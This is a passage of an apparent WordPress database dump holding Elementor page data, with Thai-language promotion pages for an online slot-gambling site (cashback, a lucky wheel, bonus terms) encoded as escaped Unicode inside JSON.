\\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e41\\u0e08\\u0e49\\u0e07\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21)<\\/li><li data-start=\\\"2304\\\" data-end=\\\"2404\\\">\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e43\\u0e14\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07 \\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e22\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e46 \\u0e41\\u0e25\\u0e30 <strong data-start=\\\"2365\\\" data-end=\\\"2385\\\">\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e42\\u0e1b\\u0e23<\\/strong> \\u0e22\\u0e01\\u0e40\\u0e27\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38\\u0e44\\u0e27\\u0e49<\\/li><li data-start=\\\"2407\\\" data-end=\\\"2499\\\">naijan <strong data-start=\\\"2414\\\" data-end=\\\"2445\\\">\\u0e02\\u0e2d\\u0e2a\\u0e07\\u0e27\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\/\\u0e22\\u0e01\\u0e40\\u0e25\\u0e34\\u0e01<\\/strong> \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e1b\\u0e0f\\u0e34\\u0e40\\u0e2a\\u0e18\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e2b\\u0e32\\u0e01\\u0e15\\u0e23\\u0e27\\u0e08\\u0e1e\\u0e1a\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\/\\u0e1c\\u0e34\\u0e14\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1263,153,'_thumbnail_id','53'),(1264,154,'_elementor_edit_mode','builder'),(1265,154,'_elementor_template_type','wp-page'),(1266,154,'_elementor_version','3.32.5'),(1267,154,'_elementor_pro_version','3.32.3'),(1268,154,'_wp_page_template','default'),(1269,154,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1270,154,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 